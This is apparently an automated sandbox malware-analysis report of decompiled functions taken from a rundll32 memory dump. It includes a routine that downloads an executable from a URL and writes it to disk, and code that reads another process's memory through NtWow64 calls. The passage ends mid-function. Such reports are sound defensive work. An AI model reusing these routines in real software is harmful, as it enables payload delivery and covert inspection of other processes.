                                                                                              • Opcode ID: e0707ef03718749f104b89f0fff45792e7cd2535e1a07012238fa9d0ad6730a4
                                                                                              • Instruction ID: e1a3ad00d25c90ce5996e40bfce70fea1504ffec41b4748f919d1c214323ee79
                                                                                              • Opcode Fuzzy Hash: e0707ef03718749f104b89f0fff45792e7cd2535e1a07012238fa9d0ad6730a4
                                                                                              • Instruction Fuzzy Hash: 56713E71B10209EFDB04EFA8D884BAEBBB9FF44304F104159E915E7250EB70AD51DB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 36%
                                                                                              			E04255DA0(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				char _v32;
                                                                                              				intOrPtr _v72;
                                                                                              				intOrPtr _v76;
                                                                                              				char _v84;
                                                                                              				intOrPtr _v976;
                                                                                              				intOrPtr _v980;
                                                                                              				signed int _v988;
                                                                                              				char _v1100;
                                                                                              				intOrPtr _v1968;
                                                                                              				intOrPtr _v1972;
                                                                                              				char _v2004;
                                                                                              				intOrPtr _v2008;
                                                                                              				char _v2012;
                                                                                              				intOrPtr _v2016;
                                                                                              				signed int _t58;
                                                                                              				struct HINSTANCE__* _t60;
                                                                                              				struct HINSTANCE__* _t62;
                                                                                              				signed int _t83;
                                                                                              				intOrPtr* _t107;
                                                                                              				intOrPtr _t127;
                                                                                              				intOrPtr* _t129;
                                                                                              				intOrPtr* _t131;
                                                                                              				intOrPtr _t132;
                                                                                              				void* _t133;
                                                                                              				signed int _t134;
                                                                                              				intOrPtr _t154;
                                                                                              
                                                                                              				_t58 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t58 ^ _t134;
                                                                                              				_v2016 = __edx;
                                                                                              				_t129 = __ecx;
                                                                                              				_t60 = GetModuleHandleA("ntdll.dll");
                                                                                              				if(_t60 != 0) {
                                                                                              					L3:
                                                                                              					_t131 = GetProcAddress(_t60, "NtWow64QueryInformationProcess64");
                                                                                              				} else {
                                                                                              					_t60 = LoadLibraryA("ntdll.dll");
                                                                                              					if(_t60 != 0) {
                                                                                              						goto L3;
                                                                                              					} else {
                                                                                              						_t131 = 0;
                                                                                              					}
                                                                                              				}
                                                                                              				_t62 = GetModuleHandleA("ntdll.dll");
                                                                                              				if(_t62 != 0) {
                                                                                              					L7:
                                                                                              					_t107 = GetProcAddress(_t62, "NtWow64ReadVirtualMemory64");
                                                                                              				} else {
                                                                                              					_t62 = LoadLibraryA("ntdll.dll");
                                                                                              					if(_t62 != 0) {
                                                                                              						goto L7;
                                                                                              					} else {
                                                                                              						_t107 = 0;
                                                                                              					}
                                                                                              				}
                                                                                              				if(_t131 == 0 || _t107 == 0) {
                                                                                              					 *((intOrPtr*)(_t129 + 0x14)) = 7;
                                                                                              					 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                                                              					 *_t129 = 0;
                                                                                              					E042532A0(_t129, 0x429c5d0);
                                                                                              					__eflags = _v8 ^ _t134;
                                                                                              					return E04275AFE(_v8 ^ _t134, 0);
                                                                                              				} else {
                                                                                              					E0427DEA0(_t129,  &_v84, 0, 0x30);
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					asm("movlpd [ebp-0x7d8], xmm0");
                                                                                              					_push( &_v2012);
                                                                                              					_push(0x30);
                                                                                              					_push( &_v84);
                                                                                              					_push(0);
                                                                                              					_push(_v2016);
                                                                                              					if( *_t131() < 0 || _v2012 != 0x30 || _v2008 != 0) {
                                                                                              						L24:
                                                                                              						E042531B0(_t129, _t129, 0x429c5d0);
                                                                                              						__eflags = _v8 ^ _t134;
                                                                                              						return E04275AFE(_v8 ^ _t134);
                                                                                              					} else {
                                                                                              						_t132 = _v2016;
                                                                                              						_push( &_v2012);
                                                                                              						_push(0);
                                                                                              						_push(0x388);
                                                                                              						_push( &_v2004);
                                                                                              						_push(_v72);
                                                                                              						_push(_v76);
                                                                                              						_push(_t132);
                                                                                              						if( *_t107() < 0 || _v2012 != 0x388 || _v2008 != 0) {
                                                                                              							goto L24;
                                                                                              						} else {
                                                                                              							_push( &_v2012);
                                                                                              							_push(0);
                                                                                              							_push(0x3f8);
                                                                                              							_push( &_v1100);
                                                                                              							_push(_v1968);
                                                                                              							_push(_v1972);
                                                                                              							_push(_t132);
                                                                                              							if( *_t107() < 0 || _v2012 != 0x3f8) {
                                                                                              								goto L24;
                                                                                              							} else {
                                                                                              								_t154 = _v2008;
                                                                                              								if(_t154 != 0) {
                                                                                              									goto L24;
                                                                                              								} else {
                                                                                              									_t83 = (_v988 & 0x0000ffff) + 1;
                                                                                              									_t133 = E04275B55( ~(_t154 > 0) | _t83 * 0x00000002, _t132, _t154);
                                                                                              									E0427DEA0(_t129, _t133, 0, 2 + (_v988 & 0x0000ffff) * 2);
                                                                                              									asm("cdq");
                                                                                              									 *_t107(_v2016, _v980, _v976, _t133, _v988 & 0x0000ffff, _t83 * 2 >> 0x20,  &_v2012,  ~(_t154 > 0) | _t83 * 0x00000002);
                                                                                              									E042531B0( &_v32, _t129, _t133);
                                                                                              									E04275B0F(_t133);
                                                                                              									 *((intOrPtr*)(_t129 + 0x14)) = 7;
                                                                                              									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                                                              									 *_t129 = 0;
                                                                                              									_t127 = _v12;
                                                                                              									if(_t127 >= 8) {
                                                                                              										 *_t129 = _v32;
                                                                                              										_v32 = 0;
                                                                                              									} else {
                                                                                              										_t101 = _v16 + 1;
                                                                                              										if(_v16 + 1 != 0) {
                                                                                              											E0427D060(_t129,  &_v32, _t101 + _t101);
                                                                                              											_t127 = _v12;
                                                                                              										}
                                                                                              									}
                                                                                              									 *((intOrPtr*)(_t129 + 0x10)) = _v16;
                                                                                              									 *((intOrPtr*)(_t129 + 0x14)) = _t127;
                                                                                              									_v12 = 7;
                                                                                              									_v16 = 0;
                                                                                              									_v32 = 0;
                                                                                              									E04253170( &_v32);
                                                                                              									return E04275AFE(_v8 ^ _t134);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}
































                                                                                              0x04255da9
                                                                                              0x04255db0
                                                                                              0x04255dbb
                                                                                              0x04255dc1
                                                                                              0x04255dc3
                                                                                              0x04255dd1
                                                                                              0x04255de2
                                                                                              0x04255dee
                                                                                              0x04255dd3
                                                                                              0x04255dd8
                                                                                              0x04255ddc
                                                                                              0x00000000
                                                                                              0x04255dde
                                                                                              0x04255dde
                                                                                              0x04255dde
                                                                                              0x04255ddc
                                                                                              0x04255df5
                                                                                              0x04255dfd
                                                                                              0x04255e0e
                                                                                              0x04255e1a
                                                                                              0x04255dff
                                                                                              0x04255e04
                                                                                              0x04255e08
                                                                                              0x00000000
                                                                                              0x04255e0a
                                                                                              0x04255e0a
                                                                                              0x04255e0a
                                                                                              0x04255e08
                                                                                              0x04255e1e
                                                                                              0x04256021
                                                                                              0x04256029
                                                                                              0x04256037
                                                                                              0x0425603a
                                                                                              0x04256046
                                                                                              0x04256051
                                                                                              0x04255e2c
                                                                                              0x04255e34
                                                                                              0x04255e42
                                                                                              0x04255e45
                                                                                              0x04255e4d
                                                                                              0x04255e4e
                                                                                              0x04255e53
                                                                                              0x04255e54
                                                                                              0x04255e56
                                                                                              0x04255e60
                                                                                              0x04256000
                                                                                              0x04256007
                                                                                              0x04256014
                                                                                              0x0425601e
                                                                                              0x04255e80
                                                                                              0x04255e80
                                                                                              0x04255e8c
                                                                                              0x04255e8d
                                                                                              0x04255e8f
                                                                                              0x04255e9a
                                                                                              0x04255e9b
                                                                                              0x04255e9e
                                                                                              0x04255ea1
                                                                                              0x04255ea6
                                                                                              0x00000000
                                                                                              0x04255ec9
                                                                                              0x04255ecf
                                                                                              0x04255ed0
                                                                                              0x04255ed2
                                                                                              0x04255edd
                                                                                              0x04255ede
                                                                                              0x04255ee4
                                                                                              0x04255eea
                                                                                              0x04255eef
                                                                                              0x00000000
                                                                                              0x04255f05
                                                                                              0x04255f05
                                                                                              0x04255f0c
                                                                                              0x00000000
                                                                                              0x04255f12
                                                                                              0x04255f1b
                                                                                              0x04255f30
                                                                                              0x04255f44
                                                                                              0x04255f5a
                                                                                              0x04255f70
                                                                                              0x04255f76
                                                                                              0x04255f7c
                                                                                              0x04255f83
                                                                                              0x04255f8a
                                                                                              0x04255f94
                                                                                              0x04255f97
                                                                                              0x04255f9d
                                                                                              0x04255fbf
                                                                                              0x04255fc1
                                                                                              0x04255f9f
                                                                                              0x04255fa2
                                                                                              0x04255fa5
                                                                                              0x04255faf
                                                                                              0x04255fb4
                                                                                              0x04255fb7
                                                                                              0x04255fa5
                                                                                              0x04255fcd
                                                                                              0x04255fd3
                                                                                              0x04255fd6
                                                                                              0x04255fdd
                                                                                              0x04255fe4
                                                                                              0x04255fe8
                                                                                              0x04255fff
                                                                                              0x04255fff
                                                                                              0x04255f0c
                                                                                              0x04255eef
                                                                                              0x04255ea6
                                                                                              0x04255e60

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04255DC3
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04255DD8
                                                                                              • GetProcAddress.KERNEL32(00000000,NtWow64QueryInformationProcess64), ref: 04255DE8
                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04255DF5
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04255E04
                                                                                              • GetProcAddress.KERNEL32(00000000,NtWow64ReadVirtualMemory64), ref: 04255E14
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                              • String ID: 0$NtWow64QueryInformationProcess64$NtWow64ReadVirtualMemory64$ntdll.dll
                                                                                              • API String ID: 310444273-3583746680
                                                                                              • Opcode ID: 36fbd8c2b212011ddea2de5197ae596867887278bfdd2e37962a904e940e8cc9
                                                                                              • Instruction ID: fd68e8a6a7a80813024e0c3b190c8ea71df314908d981d3d1483691a1502af5f
                                                                                              • Opcode Fuzzy Hash: 36fbd8c2b212011ddea2de5197ae596867887278bfdd2e37962a904e940e8cc9
                                                                                              • Instruction Fuzzy Hash: AC617771F14219ABEB509F64DC44BBEB7B8EF44314F4000AAE909E6150EB78BE84CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E04265750(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				void _v1032;
                                                                                              				char _v1033;
                                                                                              				long _v1040;
                                                                                              				WCHAR* _v1044;
                                                                                              				long _v1048;
                                                                                              				void* _v1052;
                                                                                              				signed int _t21;
                                                                                              				void* _t45;
                                                                                              				void* _t53;
                                                                                              				void* _t54;
                                                                                              				struct _OVERLAPPED* _t56;
                                                                                              				signed int _t58;
                                                                                              				void* _t59;
                                                                                              
                                                                                              				_t21 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t21 ^ _t58;
                                                                                              				_v1044 = __edx;
                                                                                              				_v1040 = 0;
                                                                                              				_t56 = 1;
                                                                                              				_v1048 = 0;
                                                                                              				_v1033 = 1;
                                                                                              				_t53 = InternetOpenW(L"Mozilla/4.0 (compatible)", 0, 0, 0, 0);
                                                                                              				_v1052 = _t53;
                                                                                              				if(_t53 == 0) {
                                                                                              					L3:
                                                                                              					return E04275AFE(_v8 ^ _t58);
                                                                                              				} else {
                                                                                              					_t45 = InternetOpenUrlW(_t53, __ecx, 0, 0, 0x80000000, 0);
                                                                                              					if(_t45 != 0) {
                                                                                              						_t54 = CreateFileW(_v1044, 0x40000000, 0, 0, 2, 0, 0);
                                                                                              						if(_t54 != 0xffffffff) {
                                                                                              							while(1) {
                                                                                              								E0427DEA0(_t54,  &_v1032, 0, 0x400);
                                                                                              								_t59 = _t59 + 0xc;
                                                                                              								InternetReadFile(_t45,  &_v1032, 0x400,  &_v1040);
                                                                                              								if(_t56 != 0 && _v1032 != 0x5a4d) {
                                                                                              									break;
                                                                                              								}
                                                                                              								_t56 = 0;
                                                                                              								WriteFile(_t54,  &_v1032, _v1040,  &_v1048, 0);
                                                                                              								if(_v1040 > 0) {
                                                                                              									continue;
                                                                                              								} else {
                                                                                              								}
                                                                                              								L10:
                                                                                              								CloseHandle(_t54);
                                                                                              								goto L11;
                                                                                              							}
                                                                                              							_v1033 = 0;
                                                                                              							goto L10;
                                                                                              						}
                                                                                              						L11:
                                                                                              						InternetCloseHandle(_t45);
                                                                                              						InternetCloseHandle(_v1052);
                                                                                              						return E04275AFE(_v8 ^ _t58);
                                                                                              					} else {
                                                                                              						InternetCloseHandle(_t53);
                                                                                              						goto L3;
                                                                                              					}
                                                                                              				}
                                                                                              			}

















                                                                                              0x04265759
                                                                                              0x04265760
                                                                                              0x04265773
                                                                                              0x0426577b
                                                                                              0x04265785
                                                                                              0x0426578a
                                                                                              0x04265794
                                                                                              0x042657a1
                                                                                              0x042657a3
                                                                                              0x042657ab
                                                                                              0x042657cf
                                                                                              0x042657df
                                                                                              0x042657ad
                                                                                              0x042657c0
                                                                                              0x042657c4
                                                                                              0x042657fb
                                                                                              0x04265800
                                                                                              0x04265802
                                                                                              0x04265810
                                                                                              0x04265815
                                                                                              0x0426582c
                                                                                              0x04265834
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04265844
                                                                                              0x0426585c
                                                                                              0x04265868
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426586a
                                                                                              0x04265873
                                                                                              0x04265874
                                                                                              0x00000000
                                                                                              0x04265874
                                                                                              0x0426586c
                                                                                              0x00000000
                                                                                              0x0426586c
                                                                                              0x0426587a
                                                                                              0x04265881
                                                                                              0x04265889
                                                                                              0x042658a1
                                                                                              0x042657c6
                                                                                              0x042657c7
                                                                                              0x00000000
                                                                                              0x042657c7
                                                                                              0x042657c4

                                                                                              APIs
                                                                                              • InternetOpenW.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 0426579B
                                                                                              • InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 042657BA
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 042657C7
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 042657F5
                                                                                              • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 0426582C
                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0426585C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04265874
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 04265881
                                                                                              • InternetCloseHandle.WININET(?), ref: 04265889
                                                                                              Strings
                                                                                              • Mozilla/4.0 (compatible), xrefs: 0426576E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseHandle$File$Open$CreateReadWrite
                                                                                              • String ID: Mozilla/4.0 (compatible)
                                                                                              • API String ID: 769820311-4055971283
                                                                                              • Opcode ID: caacfb579bc8d5e0b429aa93e993a6685e699c2d6ea7727dac3a6b404bef72ae
                                                                                              • Instruction ID: c4e2827aec92da08f6ada545c9a211e7f86b0eeb09fdace28927bfb039211825
                                                                                              • Opcode Fuzzy Hash: caacfb579bc8d5e0b429aa93e993a6685e699c2d6ea7727dac3a6b404bef72ae
                                                                                              • Instruction Fuzzy Hash: 3131CBB1B00218BBEB309B68AC45FAEB778DB45B14F1001E5F709B61C1DAB46DC58F98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 54%
                                                                                              			E04256530() {
                                                                                              				struct HINSTANCE__* _t1;
                                                                                              				_Unknown_base(*)()* _t2;
                                                                                              				struct HINSTANCE__* _t3;
                                                                                              				_Unknown_base(*)()* _t6;
                                                                                              				struct HINSTANCE__* _t15;
                                                                                              
                                                                                              				_t1 = LoadLibraryA("User32.dll");
                                                                                              				_t15 = _t1;
                                                                                              				if(_t15 != 0) {
                                                                                              					_t2 = GetProcAddress(_t15, "SetProcessDpiAwarenessContext");
                                                                                              					if(_t2 == 0) {
                                                                                              						L4:
                                                                                              						_t3 = LoadLibraryA("Shcore.dll");
                                                                                              						if(_t3 == 0) {
                                                                                              							L8:
                                                                                              							if(GetProcAddress(_t15, "SetProcessDPIAware") != 0) {
                                                                                              								goto __eax;
                                                                                              							}
                                                                                              							return 0;
                                                                                              						} else {
                                                                                              							_t6 = GetProcAddress(_t3, "SetProcessDpiAwareness");
                                                                                              							if(_t6 == 0) {
                                                                                              								goto L8;
                                                                                              							} else {
                                                                                              								_push(2);
                                                                                              								if( *_t6() == 0) {
                                                                                              									goto L8;
                                                                                              								} else {
                                                                                              									goto L7;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push(0xfffffffd);
                                                                                              						if( *_t2() != 0) {
                                                                                              							L7:
                                                                                              							return 1;
                                                                                              						} else {
                                                                                              							goto L4;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					return _t1;
                                                                                              				}
                                                                                              			}








                                                                                              0x04256536
                                                                                              0x0425653c
                                                                                              0x04256540
                                                                                              0x04256551
                                                                                              0x04256555
                                                                                              0x0425655f
                                                                                              0x04256564
                                                                                              0x0425656c
                                                                                              0x0425658a
                                                                                              0x04256594
                                                                                              0x04256598
                                                                                              0x04256598
                                                                                              0x0425659e
                                                                                              0x0425656e
                                                                                              0x04256574
                                                                                              0x04256578
                                                                                              0x00000000
                                                                                              0x0425657a
                                                                                              0x0425657a
                                                                                              0x04256580
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04256580
                                                                                              0x04256578
                                                                                              0x04256557
                                                                                              0x04256557
                                                                                              0x0425655d
                                                                                              0x04256582
                                                                                              0x04256589
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425655d
                                                                                              0x04256543
                                                                                              0x04256543
                                                                                              0x04256543

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(User32.dll,?,042565E3), ref: 04256536
                                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 04256551
                                                                                              • LoadLibraryA.KERNEL32(Shcore.dll,?,?,042565E3), ref: 04256564
                                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 04256574
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: SetProcessDPIAware$SetProcessDpiAwareness$SetProcessDpiAwarenessContext$Shcore.dll$User32.dll
                                                                                              • API String ID: 2574300362-2252252969
                                                                                              • Opcode ID: f8e84833229d4fc29e563f46983be4f324676c3e48546059d740a7e5080df06b
                                                                                              • Instruction ID: f5e8221bcc20fcad73d13b55aeab5380cbdb6124382af34f16cd4d6ea14420b4
                                                                                              • Opcode Fuzzy Hash: f8e84833229d4fc29e563f46983be4f324676c3e48546059d740a7e5080df06b
                                                                                              • Instruction Fuzzy Hash: C0F096333F8313529F21317D3C05E9A57885FD0AF57550221FC15D21A8DE64FE4298B4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E04271DE0(intOrPtr __ecx) {
                                                                                              				intOrPtr _v8;
                                                                                              				long _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				void* __esi;
                                                                                              				void* _t44;
                                                                                              				long _t45;
                                                                                              				short* _t51;
                                                                                              				void* _t54;
                                                                                              				signed int _t57;
                                                                                              				intOrPtr _t63;
                                                                                              				intOrPtr _t69;
                                                                                              				signed int _t70;
                                                                                              				signed int _t71;
                                                                                              				intOrPtr _t80;
                                                                                              				signed int _t82;
                                                                                              				struct _CRITICAL_SECTION* _t93;
                                                                                              
                                                                                              				_t63 = __ecx;
                                                                                              				_v16 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x24)) != 0) {
                                                                                              					_t93 = __ecx + 0x28;
                                                                                              					EnterCriticalSection(_t93);
                                                                                              					__eflags =  *(_t63 + 0x24);
                                                                                              					if( *(_t63 + 0x24) != 0) {
                                                                                              						_t82 = timeGetTime();
                                                                                              						_v12 = _t82;
                                                                                              						_v8 =  *((intOrPtr*)(_t63 + 0x18));
                                                                                              						__eflags = _t82;
                                                                                              						if(_t82 == 0) {
                                                                                              							_v12 = timeGetTime();
                                                                                              						}
                                                                                              						_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 + 4)))) + 0x54))();
                                                                                              						__eflags = _v12 - _v8 - _t44;
                                                                                              						if(_v12 - _v8 <= _t44) {
                                                                                              							_t69 =  *((intOrPtr*)(_t63 + 0x10));
                                                                                              							_t45 = _t82;
                                                                                              							_v8 = _t69;
                                                                                              							__eflags = _t82;
                                                                                              							if(_t82 == 0) {
                                                                                              								_t45 = timeGetTime();
                                                                                              								_t69 = _v8;
                                                                                              							}
                                                                                              							__eflags = _t45 - _t69;
                                                                                              							if(_t45 - _t69 >= 0) {
                                                                                              								_t80 =  *((intOrPtr*)(_t63 + 0x40));
                                                                                              								 *(_t63 + 0x14) =  *(_t63 + 0x14) + 1;
                                                                                              								_t70 =  *(_t63 + 0x14);
                                                                                              								__eflags =  *(_t80 + 0x50) * _t70 - 0x7d0;
                                                                                              								if(__eflags >= 0) {
                                                                                              									_t71 = 0x7d0;
                                                                                              								} else {
                                                                                              									_t21 = _t70 + 1; // 0x1
                                                                                              									_t57 = _t21;
                                                                                              									 *(_t63 + 0x14) = _t57;
                                                                                              									_t71 =  *(_t80 + 0x50) * _t57;
                                                                                              								}
                                                                                              								 *((intOrPtr*)(_t63 + 0x10)) = _t71 + _t82;
                                                                                              								_push(0xc);
                                                                                              								_v8 =  *((intOrPtr*)(_t63 + 0x20));
                                                                                              								_t51 = E04275B55(_t71, _t93, __eflags);
                                                                                              								_v12 = _t51;
                                                                                              								__eflags =  *(_t63 + 0x24) - 2;
                                                                                              								 *_t51 = 0xbb4f;
                                                                                              								 *((char*)(_t51 + 3)) = 0xbb00 |  *(_t63 + 0x24) == 0x00000002;
                                                                                              								 *((char*)(_t51 + 2)) = 1;
                                                                                              								 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t63 + 0x1c));
                                                                                              								 *((intOrPtr*)(_t51 + 8)) = _v8;
                                                                                              								LeaveCriticalSection(_t93);
                                                                                              								asm("sbb ecx, ecx");
                                                                                              								__eflags =  ~( *(_v16 + 8)) &  *(_v16 + 8) + 0x00000004;
                                                                                              								_t54 = E0426E940( ~( *(_v16 + 8)) &  *(_v16 + 8) + 0x00000004, _v12, 0xc, 0);
                                                                                              								E04275B0F(_v12);
                                                                                              								return _t54;
                                                                                              							} else {
                                                                                              								LeaveCriticalSection(_t93);
                                                                                              								return 1;
                                                                                              							}
                                                                                              						} else {
                                                                                              							SetLastError(0x5b4);
                                                                                              							__eflags = 0;
                                                                                              							LeaveCriticalSection(_t93);
                                                                                              							return 0;
                                                                                              						}
                                                                                              					} else {
                                                                                              						SetLastError(0x139f);
                                                                                              						__eflags = 0;
                                                                                              						LeaveCriticalSection(_t93);
                                                                                              						return 0;
                                                                                              					}
                                                                                              				} else {
                                                                                              					SetLastError(0x139f);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}



















                                                                                              0x04271de7
                                                                                              0x04271de9
                                                                                              0x04271df0
                                                                                              0x04271e06
                                                                                              0x04271e0a
                                                                                              0x04271e10
                                                                                              0x04271e14
                                                                                              0x04271e39
                                                                                              0x04271e3e
                                                                                              0x04271e41
                                                                                              0x04271e44
                                                                                              0x04271e46
                                                                                              0x04271e4e
                                                                                              0x04271e4e
                                                                                              0x04271e56
                                                                                              0x04271e5f
                                                                                              0x04271e61
                                                                                              0x04271e80
                                                                                              0x04271e83
                                                                                              0x04271e85
                                                                                              0x04271e88
                                                                                              0x04271e8a
                                                                                              0x04271e8c
                                                                                              0x04271e92
                                                                                              0x04271e92
                                                                                              0x04271e95
                                                                                              0x04271e97
                                                                                              0x04271eae
                                                                                              0x04271eb1
                                                                                              0x04271eb4
                                                                                              0x04271ebd
                                                                                              0x04271ec2
                                                                                              0x04271ed2
                                                                                              0x04271ec4
                                                                                              0x04271ec4
                                                                                              0x04271ec4
                                                                                              0x04271ec7
                                                                                              0x04271ecd
                                                                                              0x04271ecd
                                                                                              0x04271edd
                                                                                              0x04271ee6
                                                                                              0x04271ee8
                                                                                              0x04271eeb
                                                                                              0x04271ef3
                                                                                              0x04271efb
                                                                                              0x04271efe
                                                                                              0x04271f04
                                                                                              0x04271f0b
                                                                                              0x04271f0f
                                                                                              0x04271f12
                                                                                              0x04271f15
                                                                                              0x04271f2e
                                                                                              0x04271f30
                                                                                              0x04271f32
                                                                                              0x04271f3a
                                                                                              0x04271f4a
                                                                                              0x04271e99
                                                                                              0x04271e9f
                                                                                              0x04271ead
                                                                                              0x04271ead
                                                                                              0x04271e63
                                                                                              0x04271e68
                                                                                              0x04271e6f
                                                                                              0x04271e71
                                                                                              0x04271e7f
                                                                                              0x04271e7f
                                                                                              0x04271e16
                                                                                              0x04271e1b
                                                                                              0x04271e22
                                                                                              0x04271e24
                                                                                              0x04271e32
                                                                                              0x04271e32
                                                                                              0x04271df2
                                                                                              0x04271df7
                                                                                              0x04271e03
                                                                                              0x04271e03

                                                                                              APIs
                                                                                              • SetLastError.KERNEL32(0000139F), ref: 04271DF7
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 04271E0A
                                                                                              • SetLastError.KERNEL32(0000139F), ref: 04271E1B
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 04271E24
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 2124651672-0
                                                                                              • Opcode ID: 5dd1ac33e608b4a05b9136663d396bd179bf100e049f5fef3d8544ba78d703dd
                                                                                              • Instruction ID: dc0ec4186223109ba6b6f4065f6550e141902fdcd0bb4f8aeadd56643b27086c
                                                                                              • Opcode Fuzzy Hash: 5dd1ac33e608b4a05b9136663d396bd179bf100e049f5fef3d8544ba78d703dd
                                                                                              • Instruction Fuzzy Hash: CD419376B04204DFCB08DFA8E488AA9BBB5FF88311F1541A9E909DB341DB35ED11CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 54%
                                                                                              			E0425DF10(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
                                                                                              				intOrPtr _v8;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t21;
                                                                                              				void* _t22;
                                                                                              				int _t27;
                                                                                              				int _t34;
                                                                                              				intOrPtr _t39;
                                                                                              				void* _t41;
                                                                                              				void* _t43;
                                                                                              				void* _t48;
                                                                                              				void* _t52;
                                                                                              				void* _t58;
                                                                                              				void* _t66;
                                                                                              				void* _t67;
                                                                                              				void* _t70;
                                                                                              				void* _t74;
                                                                                              				intOrPtr* _t78;
                                                                                              				void* _t79;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_push(_t67);
                                                                                              				_t58 = _a8;
                                                                                              				_t39 = __ecx;
                                                                                              				_v8 = __ecx;
                                                                                              				if(_t58 != 0) {
                                                                                              					_t78 = _a4 + 8;
                                                                                              					_t66 = (_t58 - 1 >> 4) + 1;
                                                                                              					do {
                                                                                              						E0425DE60(__ecx,  *((intOrPtr*)(_t78 - 8)),  *((intOrPtr*)(_t78 - 4)),  *_t78,  *((intOrPtr*)(_t78 + 4)));
                                                                                              						_t79 = _t79 + 8;
                                                                                              						_t78 = _t78 + 0x10;
                                                                                              						_t66 = _t66 - 1;
                                                                                              					} while (_t66 != 0);
                                                                                              				}
                                                                                              				Sleep(0x64);
                                                                                              				_t21 =  *((intOrPtr*)(_t39 + 0xc));
                                                                                              				if(_t21 != 2) {
                                                                                              					__eflags = _t21 - 3;
